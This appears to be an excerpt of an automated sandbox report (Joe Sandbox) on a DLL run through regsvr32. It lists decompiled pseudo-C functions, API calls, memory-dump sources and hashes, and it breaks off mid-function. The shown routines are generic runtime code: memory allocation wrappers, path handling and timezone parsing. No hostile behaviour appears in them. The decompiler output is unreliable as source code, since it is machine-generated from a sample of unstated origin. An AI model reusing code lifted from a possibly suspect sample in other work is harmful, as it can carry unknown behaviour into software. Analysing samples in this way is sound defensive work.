                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                                                            • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 270 10037855-10037867 call 10011bf0 273 10037897-100378a8 call 10037552 270->273 274 10037869-10037871 270->274 283 100378aa-100378b8 call 10037732 273->283 284 100378bd-100378cc 273->284 276 10037873-1003788a call 1003768d 274->276 277 10037890 call 10037446 274->277 276->277 282 10037895 277->282 282->273 283->284
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10037855(intOrPtr* __ecx) {
                                                                                                            				intOrPtr _t12;
                                                                                                            				intOrPtr _t14;
                                                                                                            				signed char* _t15;
                                                                                                            				long* _t17;
                                                                                                            				long* _t19;
                                                                                                            				intOrPtr _t23;
                                                                                                            				intOrPtr* _t26;
                                                                                                            				void* _t28;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aa13, _t28);
                                                                                                            				_push(__ecx);
                                                                                                            				_t26 = __ecx;
                                                                                                            				if( *__ecx == 0) {
                                                                                                            					_t20 =  *0x1004eff0; // 0x1004eff4
                                                                                                            					if(_t20 == 0) {
                                                                                                            						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
                                                                                                            						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                                                                                                            						_t15 = E1003768D(0x1004eff4);
                                                                                                            						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
                                                                                                            						_t20 = _t15;
                                                                                                            						 *0x1004eff0 = _t15; // executed
                                                                                                            					}
                                                                                                            					_t14 = E10037446(_t20); // executed
                                                                                                            					 *_t26 = _t14;
                                                                                                            				}
                                                                                                            				_t17 =  *0x1004eff0; // 0x1004eff4
                                                                                                            				_t23 = E10037552(_t17,  *_t26);
                                                                                                            				if(_t23 == 0) {
                                                                                                            					_t12 =  *((intOrPtr*)(_t28 + 8))();
                                                                                                            					_t19 =  *0x1004eff0; // 0x1004eff4
                                                                                                            					_t23 = _t12;
                                                                                                            					E10037732(_t19,  *_t26, _t23);
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
                                                                                                            				return _t23;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1003785A
                                                                                                              • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3910492588-0
                                                                                                            • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                                                            • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 287 100045d0-100045ea VirtualAlloc
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
                                                                                                            				void* _t7;
                                                                                                            
                                                                                                            				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
                                                                                                            				return _t7;
                                                                                                            			}




                                                                                                            0x100045e4
                                                                                                            0x100045ea

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100045E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                                                            • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 288 100045f0-10004605 VirtualFree
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045F0(void* _a4, long _a8, long _a12) {
                                                                                                            				int _t5;
                                                                                                            
                                                                                                            				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                            				return _t5;
                                                                                                            			}




                                                                                                            0x100045ff
                                                                                                            0x10004605

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                                                            • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002592C(void* __ebx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t33;
                                                                                                            				long _t35;
                                                                                                            				intOrPtr* _t36;
                                                                                                            				void* _t43;
                                                                                                            				void* _t49;
                                                                                                            				CHAR* _t69;
                                                                                                            				void* _t74;
                                                                                                            				void* _t76;
                                                                                                            
                                                                                                            				E10011BF0(0x1003acd2, _t76);
                                                                                                            				_t33 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t69 =  *(_t76 + 8);
                                                                                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
                                                                                                            				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
                                                                                                            				if(_t35 != 0) {
                                                                                                            					if(_t35 < 0x104) {
                                                                                                            						_t36 = E100243B2();
                                                                                                            						_t67 =  *_t36;
                                                                                                            						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
                                                                                                            						 *((intOrPtr*)(_t76 - 4)) = 0;
                                                                                                            						E100258EA(0, _t69, _t76 + 8);
                                                                                                            						if(PathIsUNCA( *(_t76 + 8)) != 0) {
                                                                                                            							L15:
                                                                                                            							_t74 = 1;
                                                                                                            						} else {
                                                                                                            							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
                                                                                                            								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
                                                                                                            									CharUpperA(_t69);
                                                                                                            								}
                                                                                                            								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
                                                                                                            									goto L15;
                                                                                                            								} else {
                                                                                                            									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
                                                                                                            									if(_t49 == 0xffffffff) {
                                                                                                            										goto L15;
                                                                                                            									} else {
                                                                                                            										FindClose(_t49);
                                                                                                            										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
                                                                                                            											goto L6;
                                                                                                            										} else {
                                                                                                            											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
                                                                                                            											goto L15;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								L6:
                                                                                                            								_t74 = 0;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
                                                                                                            						_t43 = _t74;
                                                                                                            					} else {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
                                                                                                            					L3:
                                                                                                            					_t43 = 0;
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
                                                                                                            				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025931
                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                              • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                                                              • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                                                            • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                                                            • CharUpperA.USER32(?), ref: 100259DD
                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                                                            • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4080879615-0
                                                                                                            • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                                                            • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				int _t21;
                                                                                                            				long _t22;
                                                                                                            				char* _t24;
                                                                                                            				signed int _t26;
                                                                                                            				signed int _t27;
                                                                                                            				int _t29;
                                                                                                            				char* _t30;
                                                                                                            				int _t32;
                                                                                                            				char* _t33;
                                                                                                            				char* _t34;
                                                                                                            				char* _t35;
                                                                                                            				int _t36;
                                                                                                            				int _t39;
                                                                                                            				int _t41;
                                                                                                            				int _t44;
                                                                                                            				char* _t48;
                                                                                                            				signed int _t49;
                                                                                                            				void* _t51;
                                                                                                            				int _t52;
                                                                                                            				signed int _t54;
                                                                                                            				void* _t56;
                                                                                                            				void* _t58;
                                                                                                            				int _t60;
                                                                                                            				int _t63;
                                                                                                            				void* _t75;
                                                                                                            				void* _t76;
                                                                                                            				void* _t77;
                                                                                                            				signed int _t82;
                                                                                                            				char* _t87;
                                                                                                            				int _t89;
                                                                                                            				void* _t90;
                                                                                                            
                                                                                                            				_push(0x18);
                                                                                                            				_push(0x10042cd0);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				 *(_t90 - 0x20) = 0;
                                                                                                            				E10013A38(__ebx, 0, 7);
                                                                                                            				 *(_t90 - 4) = 0;
                                                                                                            				_t63 =  *0x1004f734; // 0x0
                                                                                                            				 *(_t90 - 0x28) = _t63;
                                                                                                            				 *0x1004f814 = 0;
                                                                                                            				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
                                                                                                            				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
                                                                                                            				_t87 = E1001ADE6(0x10042ccc);
                                                                                                            				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
                                                                                                            				if(_t87 == 0 ||  *_t87 == 0) {
                                                                                                            					_t21 =  *0x1004f818; // 0x0
                                                                                                            					__eflags = _t21;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						_push(_t21);
                                                                                                            						E100107C8(_t63, 0, _t87, __eflags);
                                                                                                            						 *0x1004f818 = 0;
                                                                                                            					}
                                                                                                            					_t22 = GetTimeZoneInformation(0x1004f768);
                                                                                                            					__eflags = _t22 - 0xffffffff;
                                                                                                            					if(_t22 == 0xffffffff) {
                                                                                                            						goto L31;
                                                                                                            					} else {
                                                                                                            						 *0x1004f814 = 1;
                                                                                                            						_t26 = 0x1004f768->Bias; // 0x0
                                                                                                            						_t27 = _t26 * 0x3c;
                                                                                                            						 *0x1004cde8 = _t27;
                                                                                                            						__eflags =  *0x1004f7ae; // 0x0
                                                                                                            						if(__eflags != 0) {
                                                                                                            							_t82 =  *0x1004f7bc; // 0x0
                                                                                                            							_t39 = _t27 + _t82 * 0x3c;
                                                                                                            							__eflags = _t39;
                                                                                                            							 *0x1004cde8 = _t39;
                                                                                                            						}
                                                                                                            						__eflags =  *0x1004f802; // 0x0
                                                                                                            						if(__eflags == 0) {
                                                                                                            							L22:
                                                                                                            							 *0x1004cdec = 0;
                                                                                                            							 *0x1004cdf0 = 0;
                                                                                                            							goto L23;
                                                                                                            						} else {
                                                                                                            							_t36 =  *0x1004f810; // 0x0
                                                                                                            							__eflags = _t36;
                                                                                                            							if(_t36 == 0) {
                                                                                                            								goto L22;
                                                                                                            							}
                                                                                                            							 *0x1004cdec = 1;
                                                                                                            							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
                                                                                                            							L23:
                                                                                                            							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
                                                                                                            							__eflags = _t29;
                                                                                                            							if(_t29 == 0) {
                                                                                                            								L26:
                                                                                                            								_t30 =  *0x1004ce78; // 0x1004cdf8
                                                                                                            								 *_t30 = 0;
                                                                                                            								L27:
                                                                                                            								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
                                                                                                            								__eflags = _t32;
                                                                                                            								if(_t32 == 0) {
                                                                                                            									L30:
                                                                                                            									_t33 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            									 *_t33 = 0;
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t90 - 0x1c);
                                                                                                            								if( *(_t90 - 0x1c) != 0) {
                                                                                                            									goto L30;
                                                                                                            								}
                                                                                                            								_t34 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            								_t34[0x3f] = 0;
                                                                                                            								goto L31;
                                                                                                            							}
                                                                                                            							__eflags =  *(_t90 - 0x1c);
                                                                                                            							if( *(_t90 - 0x1c) != 0) {
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            							_t35 =  *0x1004ce78; // 0x1004cdf8
                                                                                                            							_t35[0x3f] = 0;
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t41 =  *0x1004f818; // 0x0
                                                                                                            					if(_t41 == 0) {
                                                                                                            						L6:
                                                                                                            						_t44 = E100107B6(E10011820(_t87) + 1);
                                                                                                            						 *0x1004f818 = _t44;
                                                                                                            						if(_t44 == 0) {
                                                                                                            							L31:
                                                                                                            							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
                                                                                                            							L47:
                                                                                                            							return E1001254F(_t24);
                                                                                                            						}
                                                                                                            						E10017B90(_t44, _t87);
                                                                                                            						_pop(_t75);
                                                                                                            						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
                                                                                                            						E1001902F();
                                                                                                            						E10019E20( *0x1004ce78, _t87, 3);
                                                                                                            						_t48 =  *0x1004ce78; // 0x1004cdf8
                                                                                                            						_t48[3] = 0;
                                                                                                            						_t89 = _t87 + 3;
                                                                                                            						if( *_t89 == 0x2d) {
                                                                                                            							 *(_t90 - 0x20) = 1;
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            						}
                                                                                                            						_t49 = E10012749(_t63, _t75, _t90, _t89);
                                                                                                            						_pop(_t76);
                                                                                                            						 *0x1004cde8 = _t49 * 0xe10;
                                                                                                            						while(1) {
                                                                                                            							_t51 =  *_t89;
                                                                                                            							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            						}
                                                                                                            						__eflags =  *_t89 - 0x3a;
                                                                                                            						if( *_t89 != 0x3a) {
                                                                                                            							L42:
                                                                                                            							__eflags =  *(_t90 - 0x20);
                                                                                                            							if( *(_t90 - 0x20) != 0) {
                                                                                                            								 *0x1004cde8 =  ~( *0x1004cde8);
                                                                                                            							}
                                                                                                            							_t52 =  *_t89;
                                                                                                            							 *0x1004cdec = _t52;
                                                                                                            							__eflags = _t52;
                                                                                                            							if(_t52 == 0) {
                                                                                                            								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            								 *_t24 = 0;
                                                                                                            							} else {
                                                                                                            								E10019E20( *0x1004ce7c, _t89, 3);
                                                                                                            								_t24 =  *0x1004ce7c; // 0x1004ce38
                                                                                                            								_t24[3] = 0;
                                                                                                            							}
                                                                                                            							goto L47;
                                                                                                            						}
                                                                                                            						_t89 = _t89 + 1;
                                                                                                            						_t54 = E10012749(0x30, _t76, _t90, _t89);
                                                                                                            						_pop(_t77);
                                                                                                            						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
                                                                                                            						while(1) {
                                                                                                            							_t56 =  *_t89;
                                                                                                            							__eflags = _t56 - 0x30;
                                                                                                            							if(_t56 < 0x30) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = _t56 - 0x39;
                                                                                                            							if(_t56 > 0x39) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            							__eflags = _t89;
                                                                                                            						}
                                                                                                            						__eflags =  *_t89 - 0x3a;
                                                                                                            						if( *_t89 != 0x3a) {
                                                                                                            							goto L42;
                                                                                                            						}
                                                                                                            						_t89 = _t89 + 1;
                                                                                                            						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
                                                                                                            						while(1) {
                                                                                                            							_t58 =  *_t89;
                                                                                                            							__eflags = _t58 - 0x30;
                                                                                                            							if(_t58 < 0x30) {
                                                                                                            								goto L42;
                                                                                                            							}
                                                                                                            							__eflags = _t58 - 0x39;
                                                                                                            							if(_t58 > 0x39) {
                                                                                                            								goto L42;
                                                                                                            							}
                                                                                                            							_t89 = _t89 + 1;
                                                                                                            							__eflags = _t89;
                                                                                                            						}
                                                                                                            						goto L42;
                                                                                                            					}
                                                                                                            					if(E10016D00(_t87, _t41) == 0) {
                                                                                                            						goto L31;
                                                                                                            					} else {
                                                                                                            						_t60 =  *0x1004f818; // 0x0
                                                                                                            						_t99 = _t60;
                                                                                                            						if(_t60 != 0) {
                                                                                                            							_push(_t60);
                                                                                                            							E100107C8(_t63, 0, _t87, _t99);
                                                                                                            						}
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x100190ae
                                                                                                            0x100190b3
                                                                                                            0x10019092
                                                                                                            0x1001909b
                                                                                                            0x100190a3
                                                                                                            0x100190a8
                                                                                                            0x100190a8
                                                                                                            0x00000000
                                                                                                            0x10019090
                                                                                                            0x1001903d
                                                                                                            0x1001903f
                                                                                                            0x10019044
                                                                                                            0x10019048
                                                                                                            0x10019055
                                                                                                            0x10019055
                                                                                                            0x10019057
                                                                                                            0x10019059
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019050
                                                                                                            0x10019052
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x1001905b
                                                                                                            0x1001905e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019060
                                                                                                            0x10019068
                                                                                                            0x10019075
                                                                                                            0x10019075
                                                                                                            0x10019077
                                                                                                            0x10019079
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019070
                                                                                                            0x10019072
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x00000000
                                                                                                            0x10019075
                                                                                                            0x10018e82
                                                                                                            0x00000000
                                                                                                            0x10018e88
                                                                                                            0x10018e88
                                                                                                            0x10018e8d
                                                                                                            0x10018e8f
                                                                                                            0x10018e91
                                                                                                            0x10018e92
                                                                                                            0x10018e97
                                                                                                            0x00000000
                                                                                                            0x10018e8f
                                                                                                            0x10018e82

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10018E27
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • _strlen.LIBCMT ref: 10018E99
                                                                                                            • _strncpy.LIBCMT ref: 10018ECF
                                                                                                              • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 634650903-2766943729
                                                                                                            • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                                                            • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				intOrPtr* _v20;
                                                                                                            				struct tagPOINT _v28;
                                                                                                            				intOrPtr _v40;
                                                                                                            				signed char _v69;
                                                                                                            				char _v76;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t62;
                                                                                                            				intOrPtr _t68;
                                                                                                            				intOrPtr _t70;
                                                                                                            				intOrPtr _t77;
                                                                                                            				short _t78;
                                                                                                            				short _t85;
                                                                                                            				short _t90;
                                                                                                            				intOrPtr _t109;
                                                                                                            				intOrPtr _t113;
                                                                                                            				intOrPtr _t114;
                                                                                                            				intOrPtr* _t116;
                                                                                                            
                                                                                                            				_t113 = _a4;
                                                                                                            				_t116 = __ecx;
                                                                                                            				if(E10020B0B(__ecx, _t113) != 0) {
                                                                                                            					L37:
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            				_t114 =  *((intOrPtr*)(_t113 + 4));
